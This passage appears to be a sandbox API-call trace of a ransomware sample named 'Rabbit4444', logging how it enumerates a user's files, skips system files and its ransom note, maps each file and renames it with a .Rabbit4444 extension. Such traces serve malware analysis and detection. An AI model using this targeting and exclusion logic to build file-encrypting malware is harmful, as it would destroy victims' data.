RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0068.163] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0068.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.163] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0068.164] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15947426945) returned 1 [0068.164] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0068.164] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0068.164] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.164] CloseHandle (hObject=0x29c) returned 1 [0068.164] CloseHandle (hObject=0x280) returned 1 [0068.164] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2138824-5150-42FB-95C2-6147FA08716C}.Rabbit4444") returned 156 [0068.164] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2138824-5150-42FB-95C2-6147FA08716C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a2138824-5150-42fb-95c2-6147fa08716c}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2138824-5150-42FB-95C2-6147FA08716C}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a2138824-5150-42fb-95c2-6147fa08716c}.rabbit4444"), dwFlags=0x1) returned 1 [0068.165] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38198bf3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x38198bf3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x44c62adc, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A28B03F6-F89D-49BF-9411-8F0574DE8769}", cAlternateFileName="{A28B0~1")) returned 1 [0068.165] lstrcmpiW (lpString1="{A28B03F6-F89D-49BF-9411-8F0574DE8769}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.165] lstrcmpiW (lpString1="{A28B03F6-F89D-49BF-9411-8F0574DE8769}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.165] lstrcmpiW (lpString1="{A28B03F6-F89D-49BF-9411-8F0574DE8769}", lpString2="Rabbit4444.exe") returned -1 [0068.165] lstrcmpiW (lpString1="{A28B03F6-F89D-49BF-9411-8F0574DE8769}", lpString2=".") returned 1 [0068.165] lstrcmpiW (lpString1="{A28B03F6-F89D-49BF-9411-8F0574DE8769}", lpString2="..") returned 1 [0068.165] lstrcmpiW (lpString1="{A28B03F6-F89D-49BF-9411-8F0574DE8769}", lpString2="windows") returned -1 [0068.165] lstrcmpiW (lpString1="{A28B03F6-F89D-49BF-9411-8F0574DE8769}", lpString2="bootmgr") returned -1 [0068.165] lstrcmpiW (lpString1="{A28B03F6-F89D-49BF-9411-8F0574DE8769}", lpString2="pagefile.sys") returned -1 [0068.165] lstrcmpiW (lpString1="{A28B03F6-F89D-49BF-9411-8F0574DE8769}", lpString2="boot") returned -1 [0068.165] lstrcmpiW (lpString1="{A28B03F6-F89D-49BF-9411-8F0574DE8769}", lpString2="ids.txt") returned -1 [0068.165] lstrcmpiW (lpString1="{A28B03F6-F89D-49BF-9411-8F0574DE8769}", lpString2="NTUSER.DAT") returned -1 [0068.165] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{A28B03F6-F89D-49BF-9411-8F0574DE8769}" | out: lpString1="{A28B03F6-F89D-49BF-9411-8F0574DE8769}") returned="{A28B03F6-F89D-49BF-9411-8F0574DE8769}" [0068.165] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A28B03F6-F89D-49BF-9411-8F0574DE8769}", dwFileAttributes=0x0) returned 1 [0068.165] lstrlenW (lpString="{A28B03F6-F89D-49BF-9411-8F0574DE8769}") returned 38 [0068.165] lstrlenW (lpString="Rabbit4444") returned 10 [0068.165] lstrcmpiW (lpString1="574DE8769}", lpString2="Rabbit4444") returned -1 [0068.165] lstrlenW (lpString=".dll") returned 4 [0068.165] lstrcmpiW (lpString1="769}", lpString2=".dll") returned 1 [0068.165] lstrlenW (lpString=".lnk") returned 4 [0068.165] lstrcmpiW (lpString1="769}", lpString2=".lnk") returned 1 [0068.165] lstrlenW (lpString=".ini") returned 4 [0068.165] lstrcmpiW (lpString1="769}", lpString2=".ini") returned 1 [0068.165] lstrlenW (lpString=".sys") returned 4 [0068.165] lstrcmpiW (lpString1="769}", lpString2=".sys") returned 1 [0068.166] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A28B03F6-F89D-49BF-9411-8F0574DE8769}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a28b03f6-f89d-49bf-9411-8f0574de8769}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.166] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.166] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15947684330) returned 1 [0068.166] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.166] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0068.166] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0068.166] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.167] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0068.168] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0068.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.169] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0068.169] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.169] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0068.169] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15947957296) returned 1 [0068.169] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0068.169] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0068.169] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.169] CloseHandle (hObject=0x29c) returned 1 [0068.169] CloseHandle (hObject=0x280) returned 1 [0068.169] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A28B03F6-F89D-49BF-9411-8F0574DE8769}.Rabbit4444") returned 156 [0068.169] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A28B03F6-F89D-49BF-9411-8F0574DE8769}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a28b03f6-f89d-49bf-9411-8f0574de8769}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A28B03F6-F89D-49BF-9411-8F0574DE8769}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a28b03f6-f89d-49bf-9411-8f0574de8769}.rabbit4444"), dwFlags=0x1) returned 1 [0068.170] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b0bc8ee, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9b0bc8ee, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44c62adc, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}", cAlternateFileName="{A2A05~1")) returned 1 [0068.170] lstrcmpiW (lpString1="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.170] lstrcmpiW (lpString1="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.170] lstrcmpiW (lpString1="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}", lpString2="Rabbit4444.exe") returned -1 [0068.170] lstrcmpiW (lpString1="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}", lpString2=".") returned 1 [0068.170] lstrcmpiW (lpString1="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}", lpString2="..") returned 1 [0068.170] lstrcmpiW (lpString1="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}", lpString2="windows") returned -1 [0068.170] lstrcmpiW (lpString1="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}", lpString2="bootmgr") returned -1 [0068.170] lstrcmpiW (lpString1="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}", lpString2="pagefile.sys") returned -1 [0068.170] lstrcmpiW (lpString1="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}", lpString2="boot") returned -1 [0068.170] lstrcmpiW (lpString1="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}", lpString2="ids.txt") returned -1 [0068.171] lstrcmpiW (lpString1="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}", lpString2="NTUSER.DAT") returned -1 [0068.171] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}" | out: lpString1="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}") returned="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}" [0068.171] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}", dwFileAttributes=0x0) returned 1 [0068.171] lstrlenW (lpString="{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}") returned 38 [0068.171] lstrlenW (lpString="Rabbit4444") returned 10 [0068.171] lstrcmpiW (lpString1="45BF0FF9E}", lpString2="Rabbit4444") returned -1 [0068.171] lstrlenW (lpString=".dll") returned 4 [0068.171] lstrcmpiW (lpString1="F9E}", lpString2=".dll") returned 1 [0068.171] lstrlenW (lpString=".lnk") returned 4 [0068.171] lstrcmpiW (lpString1="F9E}", lpString2=".lnk") returned 1 [0068.171] lstrlenW (lpString=".ini") returned 4 [0068.171] lstrcmpiW (lpString1="F9E}", lpString2=".ini") returned 1 [0068.171] lstrlenW (lpString=".sys") returned 4 [0068.171] lstrcmpiW (lpString1="F9E}", lpString2=".sys") returned 1 [0068.171] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a2a05fc2-1616-40b7-b7c0-b4c45bf0ff9e}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.172] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.172] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15948235984) returned 1 [0068.172] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.172] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0068.172] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0068.172] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.173] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.174] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.174] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0068.174] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.174] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0068.174] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.174] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0068.174] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.174] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0068.174] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15948504391) returned 1 [0068.174] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0068.174] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0068.174] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.175] CloseHandle (hObject=0x29c) returned 1 [0068.175] CloseHandle (hObject=0x280) returned 1 [0068.175] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}.Rabbit4444") returned 156 [0068.175] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a2a05fc2-1616-40b7-b7c0-b4c45bf0ff9e}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2A05FC2-1616-40B7-B7C0-B4C45BF0FF9E}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a2a05fc2-1616-40b7-b7c0-b4c45bf0ff9e}.rabbit4444"), dwFlags=0x1) returned 1 [0068.175] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9afd7ae5, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9afd7ae5, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44c62adc, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}", cAlternateFileName="{A2F2E~1")) returned 1 [0068.175] lstrcmpiW (lpString1="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.175] lstrcmpiW (lpString1="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.176] lstrcmpiW (lpString1="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}", lpString2="Rabbit4444.exe") returned -1 [0068.176] lstrcmpiW (lpString1="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}", lpString2=".") returned 1 [0068.176] lstrcmpiW (lpString1="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}", lpString2="..") returned 1 [0068.176] lstrcmpiW (lpString1="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}", lpString2="windows") returned -1 [0068.176] lstrcmpiW (lpString1="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}", lpString2="bootmgr") returned -1 [0068.176] lstrcmpiW (lpString1="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}", lpString2="pagefile.sys") returned -1 [0068.176] lstrcmpiW (lpString1="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}", lpString2="boot") returned -1 [0068.176] lstrcmpiW (lpString1="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}", lpString2="ids.txt") returned -1 [0068.176] lstrcmpiW (lpString1="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}", lpString2="NTUSER.DAT") returned -1 [0068.176] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}" | out: lpString1="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}") returned="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}" [0068.176] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}", dwFileAttributes=0x0) returned 1 [0068.176] lstrlenW (lpString="{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}") returned 38 [0068.176] lstrlenW (lpString="Rabbit4444") returned 10 [0068.176] lstrcmpiW (lpString1="8109D79CC}", lpString2="Rabbit4444") returned -1 [0068.176] lstrlenW (lpString=".dll") returned 4 [0068.176] lstrcmpiW (lpString1="9CC}", lpString2=".dll") returned 1 [0068.176] lstrlenW (lpString=".lnk") returned 4 [0068.176] lstrcmpiW (lpString1="9CC}", lpString2=".lnk") returned 1 [0068.176] lstrlenW (lpString=".ini") returned 4 [0068.176] lstrcmpiW (lpString1="9CC}", lpString2=".ini") returned 1 [0068.176] lstrlenW (lpString=".sys") returned 4 [0068.176] lstrcmpiW (lpString1="9CC}", lpString2=".sys") returned 1 [0068.176] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a2f2e6de-da49-42df-bdcf-c458109d79cc}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.177] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.177] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15948751818) returned 1 [0068.177] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.177] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0068.177] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0068.177] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.178] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.179] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.179] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0068.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.179] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.179] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0068.179] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15949007337) returned 1 [0068.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0068.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0068.179] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.180] CloseHandle (hObject=0x29c) returned 1 [0068.180] CloseHandle (hObject=0x280) returned 1 [0068.180] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}.Rabbit4444") returned 156 [0068.180] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a2f2e6de-da49-42df-bdcf-c458109d79cc}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A2F2E6DE-DA49-42DF-BDCF-C458109D79CC}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{a2f2e6de-da49-42df-bdcf-c458109d79cc}.rabbit4444"), dwFlags=0x1) returned 1 [0068.180] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b108d9a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9b108d9a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x44c6174b, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}", cAlternateFileName="{A3EC8~1")) returned 1 [0068.180] lstrcmpiW (lpString1="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.180] lstrcmpiW (lpString1="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.180] lstrcmpiW (lpString1="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}", lpString2="Rabbit4444.exe") returned -1 [0068.181] lstrcmpiW (lpString1="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}", lpString2=".") returned 1 [0068.181] lstrcmpiW (lpString1="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}", lpString2="..") returned 1 [0068.181] lstrcmpiW (lpString1="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}", lpString2="windows") returned -1 [0068.181] lstrcmpiW (lpString1="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}", lpString2="bootmgr") returned -1 [0068.181] lstrcmpiW (lpString1="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}", lpString2="pagefile.sys") returned -1 [0068.181] lstrcmpiW (lpString1="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}", lpString2="boot") returned -1 [0068.181] lstrcmpiW (lpString1="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}", lpString2="ids.txt") returned -1 [0068.181] lstrcmpiW (lpString1="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}", lpString2="NTUSER.DAT") returned -1 [0068.181] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}" | out: lpString1="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}") returned="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}" [0068.181] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}", dwFileAttributes=0x0) returned 1 [0068.181] lstrlenW (lpString="{A3EC8C71-CFEE-485C-97C8-8CB142566DCC}") returned 38 [0068.182] lstrlenW (lpString="Rabbit4444") returned 10 [0068.183] lstrcmpiW (lpString1="142566DCC}", lpString2="Rabbit4444") returned -1 [0068.183] lstrlenW (lpString=".dll") returned 4 [0068.183] lstrcmpiW (lpString1="DCC}", lpString2=".dll") returned 1 [0068.183] lstrlenW (lpString=".lnk") returned 4 [0068.183] lstrcmpiW (lpString1="DCC}", lpString2=".lnk") returned 1 [0068.183] lstrlenW 